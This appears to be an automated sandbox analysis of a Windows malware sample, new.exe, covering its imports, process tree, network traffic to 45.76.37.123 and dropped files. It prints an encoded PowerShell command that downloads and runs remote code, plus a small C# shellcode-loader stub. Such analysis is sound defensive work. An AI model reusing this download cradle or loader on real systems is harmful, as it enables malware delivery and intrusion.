advapi32.dll.ReportEventW
kernel32.dll.GetLogicalDrives
kernel32.dll.GetDriveTypeW
kernel32.dll.GetVolumeInformationW
kernel32.dll.GetCurrentDirectoryW
mscoreei.dll.GetTokenForVTableEntry
mscoreei.dll.SetTargetForVTableEntry
kernel32.dll.GetLastError
kernel32.dll.GetStdHandle
kernel32.dll.GetConsoleMode
kernel32.dll.SetEvent
kernel32.dll.SetThreadUILanguage
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetFileSize
rasapi32.dll.RasEnumConnectionsW
rtutils.dll.TraceRegisterExA
rtutils.dll.TracePrintfExA
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
kernel32.dll.GetComputerNameW
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.CreateFileMappingW
kernel32.dll.MapViewOfFile
advapi32.dll.CreateWellKnownSid
kernel32.dll.CreateMutexW
kernel32.dll.WaitForSingleObject
kernel32.dll.OpenMutexW
kernel32.dll.GetProcessTimes
ws2_32.dll.WSAIoctl
kernel32.dll.FormatMessageW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegNotifyChangeKeyValue
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
nsi.dll.NsiFreeTable
kernel32.dll.ResetEvent
winhttp.dll.WinHttpDetectAutoProxyConfigUrl
kernel32.dll.GlobalFree
ws2_32.dll.getaddrinfo
ws2_32.dll.#116
ws2_32.dll.inet_addr
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.WSAConnect
ws2_32.dll.send
ws2_32.dll.recv
kernel32.dll.GetTempPathW
kernel32.dll.WriteFile
kernel32.dll.CreateProcessW
kernel32.dll.DeleteFileW
kernel32.dll.VirtualAllocEx
kernel32.dll.CreateThread
ntdll.dll.NtOpenProcess
ntdll.dll.NtQueryInformationToken
ntdll.dll._wcsupr
ntdll.dll.wcstombs
ntdll.dll.RtlCreateUserThread
ntdll.dll.__C_specific_handler
ntdll.dll.NtQueryVirtualMemory
ntdll.dll.RtlCompareMemory
ntdll.dll.NtOpenProcessToken
ntdll.dll.CsrGetProcessId
ntdll.dll.RtlComputeCrc32
ntdll.dll.RtlAllocateHeap
ntdll.dll.NtReadVirtualMemory
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.NtClose
ntdll.dll.RtlFreeHeap
ntdll.dll.RtlDestroyHeap
ntdll.dll.memcmp
wininet.dll.HttpSendRequestA
wininet.dll.HttpOpenRequestA
wininet.dll.InternetSetOptionA
wininet.dll.InternetReadFile
wininet.dll.InternetConnectA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetOpenA
ole32.dll.CreateStreamOnHGlobal
kernel32.dll.MoveFileExW
kernel32.dll.WriteProcessMemory
kernel32.dll.GetVersion
kernel32.dll.GetCurrentThreadId
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.GetProcAddress
kernel32.dll.GetFileSizeEx
kernel32.dll.FlushFileBuffers
kernel32.dll.GetNativeSystemInfo
kernel32.dll.SetWaitableTimer
kernel32.dll.VirtualFree
kernel32.dll.Sleep
kernel32.dll.HeapCreate
kernel32.dll.ExitThread
kernel32.dll.CreateWaitableTimerW
kernel32.dll.lstrlenA
kernel32.dll.FlushInstructionCache
kernel32.dll.GetTickCount
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetVolumeInformationA
kernel32.dll.QueryPerformanceCounter
user32.dll.wsprintfW
user32.dll.GetShellWindow
advapi32.dll.EqualSid
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.CryptAcquireContextW
advapi32.dll.GetSidSubAuthority
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
mscorwks.dll.CorExitProcess
mscorwks.dll._CorDllMain
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
netutils.dll.NetApiBufferFree
version.dll.GetFileVersionInfoSizeA
version.dll.VerQueryValueA
mscoreei.dll.CorBindToCurrentRuntime
alink.dll.CreateALink
mscoree.dll.StrongNameTokenFromPublicKey
mscoreei.dll.StrongNameTokenFromPublicKey
mscoree.dll.StrongNameFreeBuffer
mscoreei.dll.StrongNameFreeBuffer
mscorwks.dll.StrongNameErrorInfo
mscorwks.dll.StrongNameTokenFromPublicKey
mscorwks.dll.StrongNameFreeBuffer
mscoree.dll.GetRealProcAddress
mscoreei.dll.GetRealProcAddress
mscorwks.dll.CreateAssemblyNameObject
mscorwks.dll.CompareAssemblyIdentity
mscoree.dll.LoadLibraryShim
mscorpe.dll.CreateICeeFileGen
mscorpe.dll.DestroyICeeFileGen
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
mscoreei.dll.GetCORRequiredVersion
mscoreei.dll.DllCanUnloadNow
http://www.oracle.com/technetwork/java/javase/downloads/index.html
"C:\Users\user\AppData\Local\Temp\new.exe"
C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC794.tmp" "c:\Users\user\AppData\Local\Temp\CSCC783.tmp"
Local\!IETld!Mutex
Global\CLR_CASOFF_MUTEX
Global\.net clr networking
DBWinMutex

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x0040320c
Reported Checksum 0x000347fd
Actual Checksum 0x000347fd
Minimum OS Version 4.0
Compile Time 2018-12-15 22:24:41
Import Hash 3abe302b6d9a1256e6a915429af4ffd2

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x0000628f 0x00006400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.44
.rdata 0x00008000 0x0000135c 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.24
.data 0x0000a000 0x00025518 0x00000600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.05
.ndata 0x00030000 0x0000b000 0x00000000 IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003b000 0x0000c253 0x0000c400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.73

Overlay

Offset 0x00014600
Size 0x00011462

Imports

Library KERNEL32.dll:
0x408070 GetTempPathA
0x408074 GetFileSize
0x408078 GetModuleFileNameA
0x40807c GetCurrentProcess
0x408080 CopyFileA
0x408084 ExitProcess
0x40808c Sleep
0x408090 GetTickCount
0x408094 GetCommandLineA
0x408098 lstrlenA
0x40809c GetVersion
0x4080a0 SetErrorMode
0x4080a4 lstrcpynA
0x4080a8 GetDiskFreeSpaceA
0x4080ac GlobalUnlock
0x4080b8 GetLastError
0x4080bc CreateDirectoryA
0x4080c0 CreateProcessA
0x4080c4 RemoveDirectoryA
0x4080c8 CreateFileA
0x4080cc GetTempFileNameA
0x4080d0 ReadFile
0x4080d4 WriteFile
0x4080d8 lstrcpyA
0x4080dc MoveFileExA
0x4080e0 lstrcatA
0x4080e4 GetSystemDirectoryA
0x4080e8 GetProcAddress
0x4080ec GetExitCodeProcess
0x4080f0 WaitForSingleObject
0x4080f4 CompareFileTime
0x4080f8 SetFileAttributesA
0x4080fc GetFileAttributesA
0x408100 GetShortPathNameA
0x408104 MoveFileA
0x408108 GetFullPathNameA
0x40810c SetFileTime
0x408110 SearchPathA
0x408114 CloseHandle
0x408118 lstrcmpiA
0x40811c CreateThread
0x408120 GlobalLock
0x408124 lstrcmpA
0x408128 FindFirstFileA
0x40812c FindNextFileA
0x408130 DeleteFileA
0x408134 SetFilePointer
0x40813c FindClose
0x408140 MultiByteToWideChar
0x408144 FreeLibrary
0x408148 MulDiv
0x408150 LoadLibraryExA
0x408154 GetModuleHandleA
0x408158 GlobalAlloc
0x40815c GlobalFree
Library USER32.dll:
0x408184 ScreenToClient
0x408188 GetSystemMenu
0x40818c SetClassLongA
0x408190 IsWindowEnabled
0x408194 SetWindowPos
0x408198 GetSysColor
0x40819c GetWindowLongA
0x4081a0 SetCursor
0x4081a4 LoadCursorA
0x4081a8 CheckDlgButton
0x4081ac GetMessagePos
0x4081b0 LoadBitmapA
0x4081b4 CallWindowProcA
0x4081b8 IsWindowVisible
0x4081bc CloseClipboard
0x4081c0 SetClipboardData
0x4081c4 EmptyClipboard
0x4081c8 PostQuitMessage
0x4081cc GetWindowRect
0x4081d0 EnableMenuItem
0x4081d4 CreatePopupMenu
0x4081d8 GetSystemMetrics
0x4081dc SetDlgItemTextA
0x4081e0 GetDlgItemTextA
0x4081e4 MessageBoxIndirectA
0x4081e8 CharPrevA
0x4081ec DispatchMessageA
0x4081f0 PeekMessageA
0x4081f4 ReleaseDC
0x4081f8 EnableWindow
0x4081fc InvalidateRect
0x408200 SendMessageA
0x408204 DefWindowProcA
0x408208 BeginPaint
0x40820c GetClientRect
0x408210 FillRect
0x408214 DrawTextA
0x408218 EndDialog
0x40821c RegisterClassA
0x408224 CreateWindowExA
0x408228 GetClassInfoA
0x40822c DialogBoxParamA
0x408230 CharNextA
0x408234 ExitWindowsEx
0x408238 GetDC
0x40823c CreateDialogParamA
0x408240 SetTimer
0x408244 GetDlgItem
0x408248 SetWindowLongA
0x40824c SetForegroundWindow
0x408250 LoadImageA
0x408254 IsWindow
0x408258 SendMessageTimeoutA
0x40825c FindWindowExA
0x408260 OpenClipboard
0x408264 TrackPopupMenu
0x408268 AppendMenuA
0x40826c EndPaint
0x408270 DestroyWindow
0x408274 wsprintfA
0x408278 ShowWindow
0x40827c SetWindowTextA
Library GDI32.dll:
0x40804c SelectObject
0x408050 SetBkMode
0x408054 CreateFontIndirectA
0x408058 SetTextColor
0x40805c DeleteObject
0x408060 GetDeviceCaps
0x408064 CreateBrushIndirect
0x408068 SetBkColor
Library SHELL32.dll:
0x40816c ShellExecuteExA
0x408174 SHBrowseForFolderA
0x408178 SHGetFileInfoA
0x40817c SHFileOperationA
Library ADVAPI32.dll:
0x408004 RegCreateKeyExA
0x408008 RegOpenKeyExA
0x40800c SetFileSecurityA
0x408010 OpenProcessToken
0x408018 RegEnumValueA
0x40801c RegDeleteKeyA
0x408020 RegDeleteValueA
0x408024 RegCloseKey
0x408028 RegSetValueExA
0x40802c RegQueryValueExA
0x408030 RegEnumKeyA
Library COMCTL32.dll:
0x408038 ImageList_Create
0x40803c ImageList_AddMasked
0x408040 ImageList_Destroy
0x408044 None
Library ole32.dll:
0x408284 OleUninitialize
0x408288 OleInitialize
0x40828c CoTaskMemFree
0x408290 CoCreateInstance

.text
`.rdata
@.data
.ndata
.rsrc
v#Vh|,@
ihk;@
UXTHEME
USERENV
SETUPAPI
APPHELP
PROPSYS
DWMAPI
CRYPTBASE
OLEACC
CLBCATQ
NTMARTA
RichEdit
RichEdit20A
RichEd32
RichEd20
.DEFAULT\Control Panel\International
Control Panel\Desktop\ResourceLocale
Software\Microsoft\Windows\CurrentVersion
\Microsoft\Internet Explorer\Quick Launch
MulDiv
DeleteFileA
FindFirstFileA
FindNextFileA
FindClose
SetFilePointer
GetPrivateProfileStringA
WritePrivateProfileStringA
MultiByteToWideChar
FreeLibrary
LoadLibraryExA
GetModuleHandleA
GlobalAlloc
GlobalFree
ExpandEnvironmentStringsA
lstrcmpA
lstrcmpiA
CloseHandle
SetFileTime
CompareFileTime
SearchPathA
GetShortPathNameA
GetFullPathNameA
MoveFileA
SetCurrentDirectoryA
GetFileAttributesA
SetFileAttributesA
Sleep
GetTickCount
GetFileSize
GetModuleFileNameA
GetCurrentProcess
CopyFileA
ExitProcess
SetEnvironmentVariableA
GetWindowsDirectoryA
GetTempPathA
GetCommandLineA
lstrlenA
GetVersion
SetErrorMode
lstrcpynA
GetDiskFreeSpaceA
GlobalUnlock
GlobalLock
CreateThread
GetLastError
CreateDirectoryA
CreateProcessA
RemoveDirectoryA
CreateFileA
GetTempFileNameA
ReadFile
WriteFile
lstrcpyA
MoveFileExA
lstrcatA
GetSystemDirectoryA
GetProcAddress
GetExitCodeProcess
WaitForSingleObject
KERNEL32.dll
EndPaint
DrawTextA
FillRect
GetClientRect
BeginPaint
DefWindowProcA
SendMessageA
InvalidateRect
EnableWindow
ReleaseDC
GetDC
LoadImageA
SetWindowLongA
GetDlgItem
IsWindow
FindWindowExA
SendMessageTimeoutA
wsprintfA
ShowWindow
SetForegroundWindow
PostQuitMessage
SetWindowTextA
SetTimer
CreateDialogParamA
DestroyWindow
ExitWindowsEx
CharNextA
DialogBoxParamA
GetClassInfoA
CreateWindowExA
SystemParametersInfoA
RegisterClassA
EndDialog
ScreenToClient
GetWindowRect
EnableMenuItem
GetSystemMenu
SetClassLongA
IsWindowEnabled
SetWindowPos
GetSysColor
GetWindowLongA
SetCursor
LoadCursorA
CheckDlgButton
GetMessagePos
LoadBitmapA
CallWindowProcA
IsWindowVisible
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
TrackPopupMenu
AppendMenuA
CreatePopupMenu
GetSystemMetrics
SetDlgItemTextA
GetDlgItemTextA
MessageBoxIndirectA
CharPrevA
DispatchMessageA
PeekMessageA
USER32.dll
SelectObject
SetTextColor
SetBkMode
CreateFontIndirectA
CreateBrushIndirect
DeleteObject
GetDeviceCaps
SetBkColor
GDI32.dll
SHFileOperationA
SHGetFileInfoA
SHBrowseForFolderA
SHGetPathFromIDListA
ShellExecuteExA
SHGetSpecialFolderLocation
SHELL32.dll
RegEnumValueA
RegEnumKeyA
RegQueryValueExA
RegSetValueExA
RegCloseKey
RegDeleteValueA
RegDeleteKeyA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
SetFileSecurityA
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ImageList_Destroy
ImageList_AddMasked
ImageList_Create
COMCTL32.dll
CoCreateInstance
OleUninitialize
OleInitialize
CoTaskMemFree
ole32.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
Error launching installer
... %d%%
SeShutdownPrivilege
\Temp
NSIS Error
Error writing temporary file. Make sure your temp folder is valid.
%u.%u%s%s
VerQueryValueA
GetFileVersionInfoA
GetFileVersionInfoSizeA
VERSION
SHGetFolderPathA
SHFOLDER
SHAutoComplete
SHLWAPI
SHELL32
InitiateShutdownA
RegDeleteKeyExA
ADVAPI32
GetUserDefaultUILanguage
GetDiskFreeSpaceExA
SetDefaultDllDirectories
KERNEL32
*?|<>/":
%s%s.dll
g:7`B4,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.04</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
i+aM7
This file is not on VirusTotal.

Process Tree

  • new.exe 1332
    • new.exe 828
      • powershell.exe 2084 -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgA ...(truncated)
        • csc.exe 1096 /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline"
          • cvtres.exe 2276 /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC794.tmp" "c:\Users\user\AppData\Local\Temp\CSCC783.tmp"
  • explorer.exe 1632

new.exe, PID: 1332, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\new.exe
Command Line: "C:\Users\user\AppData\Local\Temp\new.exe"
new.exe, PID: 828, Parent PID: 1332
Full Path: C:\Users\user\AppData\Local\Temp\new.exe
Command Line: "C:\Users\user\AppData\Local\Temp\new.exe"
powershell.exe, PID: 2084, Parent PID: 828
Full Path: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe
Command Line: C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA0ADUALgA3ADYALgAzADcALgAxADIAMwAvAGQAYQB0AGEAMgAuAGIAaQBuACcAKQA=
csc.exe, PID: 1096, Parent PID: 2084
Full Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
Command Line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline"
cvtres.exe, PID: 2276, Parent PID: 1096
Full Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
Command Line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC794.tmp" "c:\Users\user\AppData\Local\Temp\CSCC783.tmp"
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 45.76.37.123 [VT] Netherlands

TCP

Source Source Port Destination Destination Port
192.168.35.21 49173 45.76.37.123 80

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://45.76.37.123/data2.bin
GET /data2.bin HTTP/1.1
Host: 45.76.37.123
Connection: Keep-Alive

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name 255757898
Associated Filenames
C:\Users\user\AppData\Local\Temp\255757898
File Size 59990 bytes
File Type data
MD5 3e833e2d95c384826746f17c5de23070
SHA1 71a2e0e3b2952671bed2f10ac0e5bfd51fb2cd20
SHA256 27a96625e6cc8c1b112242fcf2b5906af22d4f8f5372925657b0a3701dcaae5a
CRC32 CD02C694
Ssdeep 1536:9VLLF6pPEe9rXkQuZRdVmMCoyxpotW9vxLa7tVApJjOHD6C:7LF6tEUcNjyACvyVAPC
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name System.dll
Associated Filenames
C:\Users\user\AppData\Local\Temp\nse9B27.tmp\System.dll
File Size 11776 bytes
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
CRC32 BF2283F5
Ssdeep 192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name VSG2JVG94V2257O0TMPH.temp
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File Size 8016 bytes
File Type data
MD5 be97beba9cab2e42a9c6dea9be5cd5fb
SHA1 16395f18b32e0a03873ad5dcef1ee95cffb099d5
SHA256 0a40e41827e5786972f3894073c1dfb9e2fe99d5d33700756553e1d939e61016
CRC32 ED717AC0
Ssdeep 96:sqCUdMqY4+qvsqvJCwor1aqCUdMqY4+qvsEHyqvJCwort1CCX3MbH809xCXAlUVL:sE1or1aEdHnort1CCZ09xClpb
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 9zdcwezu.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.tmp
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.err
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 9zdcwezu.0.cs
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
File Size 451 bytes
File Type UTF-8 Unicode (with BOM) text
MD5 35f2dde277c3b3b22293ce49bf5ab9c2
SHA1 237c7c78b549baea28824793e87d42911c78dd75
SHA256 e7f651b50e565ce304ed0b0b742088e1d4ff0a83c2668c15a555c8c20f484600
CRC32 E1DECBD1
Ssdeep 6:V/DsYLDS81zu4r/0P9MGiVFSRrFfLG/MwSiVFSRBHALRZNu8K0wWNiVFSRHq18FF:V/DTLDfuG0rpGf6tcZNuWfu8uOKy
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
\xef\xbb\xbfusing System;
using System.Runtime.InteropServices;

namespace efgh
{
    public class abcd
    {
    [DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr a, UInt32 b);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr o7, IntPtr o1,uint o2,uint o3,uint o4);

    }

}
File name 9zdcwezu.cmdline
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
File Size 307 bytes
File Type UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5 ab8f7759d3bc1d0a1bd63e8a9e2bf3fe
SHA1 4fbc798b360a8cdb496992ef9143f0302d54a833
SHA256 257ccfe454df84b22d125cd9f87dc4133345607779bc42b2e07f2ac348371c40
CRC32 FAF81579
Ssdeep 6:pAu+H2LvFJDdq++bDdqBnOk/23f0QmGsSAE2NOk/23fpAn:p37LvS9nPAE2MRAn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
\xef\xbb\xbf/t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\9zdcwezu.dll" /D:DEBUG /debug+ /optimize- /warnaserror  "C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs"
File name 9zdcwezu.out
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.out
File Size 405 bytes
File Type UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
MD5 c6a9acc1516f6549eecf01babf481cc0
SHA1 1bef2ca091e8b6bae6ca1fcd79f2cd16d1dbf904
SHA256 30ee757f0194e37a5dc23adfb9843e758c620f421de23b4ed92abc9e60ee7a22
CRC32 1935342D
Ssdeep 6:KOOk/23fcMLAwmPwRhMuAu+H2LvFJDdq++bDdqBnOk/23f0QmGsSAE2NOk/23fpJ:Kp9NzR37LvS9nPAE2MRA+
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
\xef\xbb\xbfC:\Users\user\AppData\Local\Temp> "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:"C:\Users\user\AppData\Local\Temp\9zdcwezu.dll" /D:DEBUG /debug+ /optimize- /warnaserror  "C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs"


File name CSCC783.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\CSCC783.tmp
File Size 652 bytes
File Type MSVC .res
MD5 869f5c1074721486ed4e172110abf91e
SHA1 906b4bb15a934ea3eafe3f7d631dc6695b307e02
SHA256 58fac54584e2ecdd67d994e6fd578321a9612fbbece1ca7584509b032f58a943
CRC32 E695438D
Ssdeep 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry5FVak7YnqqIFaPN5Dlq5J:+RI+ycuZhN7FVakSIFaPNnqX
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 9zdcwezu.pdb
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
File Size 7680 bytes
File Type MSVC program database ver \002
MD5 01cedd0cd76875eb48e12ff1fbeff50d
SHA1 3e22441c1cc0f0e839ac3dd9cb67252b695bb9c3
SHA256 a134cae9e6834da53c386eaefe92b1fe76180cc5e42ff208bf3f01b1fa415724
CRC32 77EA6838
Ssdeep 6:zz/BamfXllNS/PBsjK41mllxrS/77715KZYXOBsjKufoGggksl/3YXBGQu+e0KWI:zz/H1W/YXSXS/pw4VfmqRi
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name RESC794.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\RESC794.tmp
File Size 1196 bytes
File Type 80386 COFF executable not stripped - version 25189
MD5 dbe1da5fa3669380e46ec8383602e25b
SHA1 c746ee92d0804c6a6e4bfbcc43a0e0dde99244a3
SHA256 796e0d2946559dbd861f3611475e163e834fa6048ba01b3345b28875062da006
CRC32 ABF325AC
Ssdeep 24:HSJ9YeqWEUHCUnhKLI+ycuZhN7FVakSIFaPNnqjtd:neqK9nhKL1ulZVa3GWqjH
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 9zdcwezu.dll
Associated Filenames
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
File Size 3584 bytes
File Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 0307437321e2368abb41bba07ef9eb3a
SHA1 3742e23af9afbfe2aa8e099173f699b75274299b
SHA256 07472ed80052caf10fe888366a9202f1af89c2a9cfa5ce69e9e0a922518dfc39
CRC32 078AEFC9
Ssdeep 48:60BVPOlRd8XsRFPHduJNG3AXcS1ulZVa3GWq:RPOLdyiFflcebVKG
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Type Extracted Shellcode
Size 61440 bytes
Virtual Address 0x03FB0000
Process new.exe
PID 1332
Path C:\Users\user\AppData\Local\Temp\new.exe
MD5 601d3ced4094c8ed790723ad383584f9
SHA1 b8099907af4f031c5db3a306ab72506a18efa308
SHA256 a51c762c6779f826b95a6d2d3bc9a7a9e74f286477ef038a5739af8322072cd1
CRC32 C0488A3A
Ssdeep 1536:9VLLF6pPEe9rXkQuZRdVmMCoyxpotW9vxLa7tVApJ+QOqwAZo:7LF6tEUcNjyACvyVA5Zo
Yara
  • shellcode - Matched shellcode byte patterns
  • HeavensGate - Heaven's Gate: Switch from 32-bit to 64-mode
